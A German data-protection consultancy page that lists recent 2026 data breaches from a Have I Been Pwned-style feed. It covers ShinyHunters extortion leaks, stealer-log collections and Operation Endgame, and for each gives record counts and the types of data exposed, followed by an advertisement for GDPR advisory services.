On 18 June 2026, the latest phase of Operation Endgame targeted the SocGholish malware operation, a prolific malware distribution network used to compromise systems and facilitate further cybercrime. Coordinated by international law enforcement agencies with support from Europol and Eurojust, the operation remediated almost 15,000 compromised websites and disrupted more than 100 servers and domains used to distribute malware. Authorities initially provided HIBP with 154k impacted email addresses and more than half a million previously unseen passwords recovered during the operation. The following week, a further 4M email addresses and 9M passwords relating to the StealC malware operation targeted by Operation Endgame were provided to HIBP, bringing the total to almost 4.2M unique email addresses.
15.06.2026 - Glendale Community College 793.925 Datensätze geleaked
Academic records, Dates of birth, Email addresses, Genders, Government issued IDs, Names, Phone numbers, Physical addresses

In June 2026, Glendale Community College was the target of a ShinyHunters "pay or leak" extortion campaign. Data allegedly obtained from Glendale was later published online and included almost 800k unique email addresses along with various other data fields, including names, addresses, phone numbers, Social Security numbers and other information relating to student enrolments. In its disclosure notice, the college advised that "the potentially impacted information may vary for each individual and may include all or just one of the above-listed types of information".
15.06.2026 - June 2026 Stealer Logs 56.278.397 Datensätze geleaked
Email addresses, Passwords

In June 2026, a collection of accumulated stealer logs from various sources was added to HIBP. The corpus comprised 56M unique email addresses across hundreds of millions of stealer log records. The data also contained 124M unique passwords, which have been added to Pwned Passwords and are now searchable. Individuals can view any records captured against their email address in the stealer logs section of their dashboard. Organisations can see logs affecting their domain via the stealer logs API.
15.06.2026 - Moody Bible Institute 2.303.416 Datensätze geleaked
Dates of birth, Email addresses, Genders, Marital statuses, Names, Phone numbers, Physical addresses

In June 2026, Moody Bible Institute was targeted by a ShinyHunters "pay or leak" extortion campaign. Over 2.3M unique email addresses and other personal data were later published publicly, including names, physical addresses, phone numbers, dates of birth and other information relating to donors, supporters, students and alumni. In their disclosure notice, Moody advised that they had "engaged both internal and external cybersecurity experts to thoroughly investigate the matter".
15.06.2026 - Sysco 2.691.852 Datensätze geleaked
Customer feedback, Email addresses, Employers, Job titles, Names, Phone numbers, Physical addresses, Usernames

In June 2026, the food distribution company Sysco was targeted by a ShinyHunters "pay or leak" extortion campaign. Data was subsequently published containing 2.7M unique email addresses belonging to staff and customers. The data also contained largely corporate contact information including names, phone numbers, physical addresses, internal job titles, and customer feedback.
12.06.2026 - American Tower 216.601 Datensätze geleaked
Email addresses, Job titles, Names, Phone numbers, Physical addresses

In June 2026, telecommunications tower infrastructure company American Tower was the target of a ShinyHunters "pay or leak" extortion campaign. The group subsequently published data allegedly taken from the company containing more than 200k unique email addresses belonging to employees, contractors, customers, and leads. Exposed data also included names, addresses, and phone numbers.
12.06.2026 - JCPenney 368.418 Datensätze geleaked
Dates of birth, Email addresses, Government issued IDs, Job titles, Names, Phone numbers, Physical addresses, Usernames

In June 2026, retailer JCPenney and associated brands were targeted in a ShinyHunters "pay or leak" extortion campaign. Data allegedly obtained from JCPenney through the exploitation of a critical zero-day vulnerability in Oracle PeopleSoft was later published publicly. The exposed records indicated they primarily related to internal HR systems and impacted current and former employees. The data included 368k corporate and personal email addresses, names, dates of birth, Social Security numbers, phone numbers and home addresses.
11.06.2026 - Ralph Lauren 139.903 Datensätze geleaked
Age groups, Email addresses, Genders, Names, Phone numbers

In June 2026, fashion retailer Ralph Lauren was targeted in a ShinyHunters "pay or leak" extortion campaign. The group subsequently published hundreds of gigabytes of data they claimed was obtained from the organisation's Salesforce instance, including 140k unique email addresses along with names, phone numbers, genders and age groups.
09.06.2026 - University of Nottingham 454.635 Datensätze geleaked
Academic records, Citizenship statuses, Dates of birth, Disabilities, Email addresses, Ethnicities, Genders, IP addresses, Names, Passport numbers, Phone numbers, Physical addresses, Purchases, Salutations, Usernames

In June 2026, the University of Nottingham was the target of a cyber attack, later linked to a ShinyHunters "pay or leak" extortion campaign. Tens of gigabytes of data were subsequently published online and included 455k unique email addresses along with extensive personal information including names, addresses, phone numbers, ethnicities, disabilities, passport numbers and information relating to academic enrolments and fee payments. In a post about the incident, the university advised that the breach affected both "current students, and alumni".
05.06.2026 - Madison Square Garden Sports 9.796.738 Datensätze geleaked
Customer service records, Email addresses, Names, Phone numbers, Physical addresses

In June 2026, the sports and entertainment company Madison Square Garden Sports was the target of a ShinyHunters "pay or leak" extortion campaign. The group later published the alleged data, which included almost 10M unique email addresses spanning staff and customers, along with extensive personal, employment and customer relationship information.
30.05.2026 - Atlas Menu 63.926 Datensätze geleaked
Email addresses, IP addresses, Passwords, Support tickets, Usernames

In May 2026, the GTA V and CS2 cheat service Atlas Menu suffered a data breach. An attacker claimed to have gained access to all Atlas systems and published the service's database to a public GitHub repository. The incident exposed 64k unique email addresses along with usernames, IP addresses, support tickets and passwords stored as bcrypt hashes.
29.05.2026 - BCD Travel 396.313 Datensätze geleaked
Email addresses, Employers, Job titles, Names, Phone numbers, Physical addresses, Support tickets

In May 2026, the corporate travel management company BCD Travel was claimed as a victim of the ShinyHunters "pay or leak" extortion campaign. Data allegedly obtained from BCD was subsequently published publicly in early June and contained 396k unique email addresses. Other exposed data included names, addresses, phone numbers, job titles and employer names, spanning a variety of different data sets including leads, internal staff and support tickets.
23.05.2026 - Baker Distributing 102.935 Datensätze geleaked
Email addresses, Names, Phone numbers, Physical addresses, Support tickets

In May 2026, the HVAC/R wholesale distributor Baker Distributing Company was added to the ShinyHunters data extortion group's "pay or leak" site. In early June, the group publicly published data they claimed had been obtained from Baker's SharePoint and Salesforce infrastructure including 103k unique email addresses along with names, physical addresses, phone numbers and tickets relating to the company's HVAC contractor customer base. The exposed data was largely corporate contact and support information with limited sensitivity.
23.05.2026 - Charter 4.851.517 Datensätze geleaked
Email addresses, Job titles, Names, Phone numbers, Physical addresses

In May 2026, the telecommunications company Charter Communications (the parent company behind the consumer broadband and cable brand Spectrum) was named by the ShinyHunters group in a "pay or leak" extortion campaign. The group later published the data, which exposed 4.9M unique email addresses along with names, phone numbers and physical addresses. A subset of approximately 85k records originating from an internal employee directory also included job titles. Charter confirmed the incident, but stated that no sensitive personal information or customer proprietary network information (CPNI) was exfiltrated.
23.05.2026 - DentaQuest 2.553.599 Datensätze geleaked
Dates of birth, Email addresses, Genders, Government issued IDs, Health insurance information, Names, Phone numbers, Physical addresses

In May 2026, the dental benefits administrator DentaQuest was the target of a ShinyHunters "pay or leak" extortion campaign that resulted in the group publicly publishing hundreds of gigabytes of data allegedly obtained from the company. The data included 2.6M unique email addresses along with names, addresses and phone numbers. Much of the data appeared in healthcare enrollment files (ASC X12 transaction sets) with some containing Medicaid IDs, while additional data appeared in member records and related files. DentaQuest acknowledged "a cybersecurity incident involving unauthorized access to a limited portion of our network", and advised they had contained the attack and mitigated the threat.
05.05.2026 - Cushman & Wakefield 310.431 Datensätze geleaked
Email addresses, Job titles, Names, Phone numbers, Physical addresses, Salutations

In May 2026, the real estate services firm Cushman & Wakefield was the target of a "pay or leak" extortion campaign by the ShinyHunters group. Following the threat, the group publicly published data they alleged had been obtained from the firm, consisting mostly of C&W email addresses along with tens of thousands of external email addresses and corporate contact records. The exposed data was primarily business information, including names, job titles, company addresses and phone numbers.
30.04.2026 - Reborn Gaming 126 Datensätze geleaked
Email addresses, IP addresses

In April 2026, the gaming community Reborn Gaming suffered a data breach due to a vulnerability in cPanel and WebHost Manager (WHM). The breach exposed 126 unique email addresses along with IP addresses and Steam IDs. Reborn Gaming self-submitted the data to Have I Been Pwned.
28.04.2026 - Vimeo 119.167 Datensätze geleaked
Email addresses, Names

In April 2026, the ShinyHunters extortion group listed Vimeo on their extortion portal as part of their "pay or leak" campaign. They subsequently published hundreds of gigabytes of data, predominantly consisting of video titles, technical data and metadata. The data also included 119k unique email addresses, sometimes accompanied by names. Vimeo attributed the exposure to a breach of Anodot, a third-party analytics vendor, and advised the incident does not include "Vimeo video content, valid user login credentials, or payment card information".
26.04.2026 - CTT 468.124 Datensätze geleaked
Email addresses, Names, Phone numbers

In April 2026, data allegedly obtained from CTT, Portugal's national postal service, was posted to a public hacking forum. The data included 468k unique email addresses along with names, phone numbers and parcel tracking numbers which can be used to retrieve the tracking history of the parcel.
24.04.2026 - Udemy 1.401.259 Datensätze geleaked
Email addresses, Employers, Job titles, Names, Payment methods, Phone numbers, Physical addresses

In April 2026, online training company Udemy was the victim of a “pay or leak” extortion attempt perpetrated by the ShinyHunters group. The data was subsequently leaked publicly and contained 1.4M unique email addresses belonging to customers and instructors. The data also included names, physical addresses, phone numbers, employer information and instructor payout methods including PayPal, cheque and bank transfer.
20.04.2026 - ADT 5.488.888 Datensätze geleaked
Dates of birth, Email addresses, Names, Partial government issued IDs, Phone numbers, Physical addresses

In April 2026, home security firm ADT confirmed a data breach by ShinyHunters, which listed the company on its website as part of a "pay or leak" extortion attempt. The breach impacted 5.5M unique email addresses along with names, phone numbers and physical addresses. ADT also advised that "in a small percentage of cases, dates of birth and the last four digits of Social Security numbers or Tax IDs were included" and that it had contacted all affected people.
20.04.2026 - Aman 215.563 Datensätze geleaked
Dates of birth, Email addresses, Genders, Language preferences, Names, Nationalities, Phone numbers, Physical addresses, Spouses names, VIP statuses

In April 2026, the ultra-luxury hotel brand Aman was named by ShinyHunters as the target of a "pay or leak" extortion campaign, with the data allegedly obtained from their Salesforce CRM. The data was subsequently leaked publicly and contained over 200k unique email addresses. Whilst not present on all records, the data also included genders, physical addresses, phone numbers, nationalities, dates of birth, spouse names and VIP status codes.
20.04.2026 - Canada Life 237.810 Datensätze geleaked
Email addresses, Job titles, Names, Phone numbers, Physical addresses, Salutations, Support tickets

In April 2026, Canada Life was the victim of a "pay or leak" extortion campaign by the ShinyHunters group. The group subsequently published the data which contained over 200k unique email addresses along with names, phone numbers, physical addresses and, in some cases, customer support tickets. In their disclosure notice, Canada Life advised that "it is a small proportion of our customers who may have been impacted". In the wake of the incident, Canada Life also published an alert cautioning customers to be wary of phishing attacks, a pattern often seen after the public release of breached data.
20.04.2026 - Pitney Bowes 8.243.989 Datensätze geleaked
Email addresses, Job titles, Names, Phone numbers, Physical addresses

In April 2026, the hacking collective ShinyHunters claimed to have obtained data from Pitney Bowes as part of a broader extortion campaign that also named several other organisations. After negotiations allegedly failed, the group publicly released the data which included 8.2M unique email addresses, along with names, phone numbers and physical addresses. A subset of the data also included Pitney Bowes employee records with job titles.
18.04.2026 - Carnival 7.531.359 Datensätze geleaked
Dates of birth, Email addresses, Genders, Geographic locations, Loyalty program details, Names, Salutations

In April 2026, the notorious hacking collective ShinyHunters claimed they had obtained a substantial volume of data belonging to the Carnival cruise operator and attempted to extort the organisation to prevent the data from being leaked. The following week, the group published the data publicly, which contained 8.7M records with 7.5M unique email addresses. The data contained fields indicating it related to the Mariner Society loyalty program run by Holland America, a cruise line brand under Carnival, and included names, dates of birth, genders and data relating to status within the loyalty program. Carnival acknowledged a phishing incident involving a single user account and advised they were working to better understand the scope of the unauthorised activity.
15.04.2026 - Kemper 269.299 Datensätze geleaked
Email addresses, Names, Partial credit card data, Phone numbers, Physical addresses, Purchases

In April 2026, the American insurance holding company Kemper Corporation was named by the ShinyHunters ransomware group in a "pay or leak" extortion campaign. The attackers allegedly accessed Kemper's Salesforce environment via social engineering as part of a broader campaign targeting hundreds of organisations using the same method. The group later published tens of gigabytes of data they claimed included internal directory data, Salesforce records and Stripe payment logs. Among the 269k unique email addresses were names, phone numbers, physical addresses and partial payment card data including the last 4 digits, expiry dates and card brands. Kemper confirmed the incident and stated they had engaged third-party cybersecurity experts and notified law enforcement.
15.04.2026 - Zara 197.376 Datensätze geleaked
Email addresses, Geographic locations, Purchases, Support tickets

In April 2026, the fashion brand Zara was among a number of organisations targeted by the ShinyHunters extortion group as part of their "pay or leak" campaign. The group claimed the breach was related to a compromise of the Anodot analytics platform and subsequently published a terabyte of data allegedly including 95M support ticket records. The data contained 197k unique email addresses alongside product SKUs, order IDs and the market the support ticket originated in. Zara's parent company Inditex advised that the incident didn't affect passwords or payment information.
14.04.2026 - Abrigo 711.099 Datensätze geleaked
Email addresses, Employers, Job titles, Names, Phone numbers, Physical addresses

In April 2026, the fintech software company Abrigo was targeted in a "pay or leak" extortion attempt by the ShinyHunters group. Shortly after, data allegedly taken from the company's Salesforce instance was published publicly and contained over 700k unique email addresses belonging to both Abrigo staff and external contacts. Whilst separate from Abrigo's Salesforce compromise via the Drift application connector the previous year, the data fields described in that incident are consistent with the ShinyHunters data, namely that it was "business contact information" including "institution name, employee name, email addresses, and phone numbers".
12.04.2026 - Marcus & Millichap 1.837.078 Datensätze geleaked
Email addresses, Employers, Job titles, Names, Phone numbers, Physical addresses

In April 2026, the commercial real estate brokerage firm Marcus & Millichap was named as one of multiple alleged victims of the ShinyHunters hacking and extortion group. Data alleged to have been obtained from the company was subsequently released publicly and included 1.8M unique email addresses, along with names, phone numbers and employment-related information including employer, job title and physical company address. In their disclosure notice, Marcus & Millichap advised that data which may have been accessed appeared limited to "company forms, templates, marketing materials, and general contact information".
12.04.2026 - Mytheresa 84.108 Datensätze geleaked
Email addresses, Names, Partial credit card data, Phone numbers, Physical addresses, Purchases, Salutations

In April 2026, the luxury fashion e-commerce platform Mytheresa was listed as a victim of the ShinyHunters "pay or leak" extortion group. After the ransom deadline passed, the group publicly released the data which contained 84k unique email addresses. The exposed data also included names, phone numbers, physical addresses, purchases and partial credit card data including card type, last 4 digits and expiry date.
10.04.2026 - McGraw Hill 13.500.136 Datensätze geleaked
Email addresses, Names, Phone numbers, Physical addresses

In April 2026, education company McGraw Hill confirmed a data breach following an extortion attempt. Attributed to a Salesforce misconfiguration, the company stated the incident exposed "a limited set of data from a webpage hosted by Salesforce on its platform". More than 100GB of data was later publicly distributed, containing 13.5M unique email addresses across multiple files, with additional fields such as name, physical address and phone number appearing inconsistently across some records.
08.04.2026 - 7-Eleven 185.256 Datensätze geleaked
Dates of birth, Email addresses, Names, Phone numbers, Physical addresses

In April 2026, 7-Eleven was the victim of a "pay or leak" extortion campaign by ShinyHunters, with the data later published that month. The incident exposed 185k unique email addresses, along with names, physical addresses, dates of birth and phone numbers. A small number of records also contained additional exposed data fields. The company later advised the breach was limited to "certain 7-Eleven systems used to store franchisee documents", a statement consistent with the exposed data.
07.04.2026 - My Lovely AI 106.271 Datensätze geleaked
Email addresses, Social media profiles

In April 2026, the NSFW AI girlfriend platform My Lovely AI suffered a data breach that exposed over 100k users. The data included user-created prompts and links to the resulting AI-generated images, along with a small number of Discord and X usernames.
06.04.2026 - LegionProxy 10.144 Datensätze geleaked
Email addresses, Names, Passwords, Purchases

In April 2026, the commercial residential and ISP proxy network LegionProxy suffered a data breach. The incident exposed 10k email addresses, bcrypt password hashes, names and purchases.
03.04.2026 - Amtrak 2.147.679 Datensätze geleaked
Email addresses, Names, Physical addresses, Support tickets

In April 2026, the hacking group ShinyHunters claimed they had breached Amtrak. The group typically compromises organisations' Salesforce instances before demanding a ransom and later, if not paid, dumping the data publicly. They subsequently published the alleged data which contained over 2M unique email addresses along with names, physical addresses and customer support records.
02.04.2026 - SongTrivia2 291.739 Datensätze geleaked
Auth tokens, Avatars, Email addresses, Names, Passwords, Usernames

In April 2026, the music trivia platform SongTrivia2 suffered a data breach that was subsequently published to a public hacking forum. The data contained a total of 291k unique email addresses sourced from either Google OAuth logins or accounts created on the site, the latter also containing bcrypt password hashes. The data also included names, usernames and avatars.
31.03.2026 - Hallmark 1.736.520 Datensätze geleaked
Email addresses, Names, Phone numbers, Physical addresses, Support tickets

In March 2026, Hallmark suffered an alleged breach and subsequent extortion after attackers gained access to data stored within Salesforce. The data was later published after the extortion deadline passed, exposing 1.7M unique email addresses across both Hallmark and the Hallmark+ streaming service, along with names, phone numbers, physical addresses and support tickets.
27.03.2026 - ZenBusiness 5.118.184 Datensätze geleaked
Email addresses, Names, Phone numbers

In March 2026, the hacker and extortion group "ShinyHunters" claimed to have obtained a substantial corpus of data from ZenBusiness, a business formation and compliance platform. The group claimed the data had been exfiltrated from platforms including Snowflake, Mixpanel and Salesforce, and threatened to publish it if a ransom was not paid. The following month, after claiming payment had not been made, ShinyHunters publicly released the data. The collection amounted to many terabytes across thousands of files that appeared to originate from multiple systems and business functions, including leads, support records and other CRM-related data. The data contained approximately 5M unique email addresses, often accompanied by name and phone number depending on the source file.
26.03.2026 - BreachForums Version 5 339.778 Datensätze geleaked
Email addresses, Passwords, Usernames

In March 2026, a breach of one of the many iterations of the BreachForums hacking forum known as "Version 5" was publicly disclosed. The incident exposed 340k unique email addresses along with usernames and argon2 password hashes.
25.03.2026 - Addi 34.532.941 Datensätze geleaked
Age groups, Credit scores, Device information, Email addresses, Government issued IDs, Income levels, IP addresses, Latitude and longitude pairs, Names, Phone numbers, Physical addresses, Purchases, Socioeconomic levels

In March 2026, the Colombian fintech company Addi identified unauthorised activity on its platform and advised customers that "it is possible that your personal information may have been compromised". The "pay or leak" extortion group ShinyHunters subsequently claimed responsibility and published a large trove of personal data allegedly obtained from Addi. The data included 34M unique email addresses from credit scoring requests, credit bureau records, customer identity records and email validation logs. It also contained government issued IDs (Cédula de Ciudadanía), estimated income, socioeconomic levels, purchases and other credit-related data points.
Sind Sie betroffen? Hier prüfen!






Unsere TÜV-geprüften Berater sind für Sie da!

Wir haben Experten sowohl für die rechtlichen Anforderungen durch die DSGVO und das Bundesdatenschutzgesetz als auch für die technische Seite der IT-Sicherheit. Wir können Sie dahingehend über mögliche technische Risiken und Schutzmaßnahmen gleichermaßen beraten wir zur Umsetzung der gesetzlichen Anforderungen an den Datenschutz im Unternehmen und im Verein. Von den technischen und organisatorischen Maßnahmen über das Verfahrensverzeichnis sowie die praktische Umsetzung der Vorgaben können wir Sie gerne unterstützen.

Unsere Datenschutz-Experten beraten Sie gerne »





Keine Angst vor der DSGVO - wir helfen!










© 2012 - 2026 | SD Software-Design GmbH
Impressum | Datenschutz | Karriere | Online-Services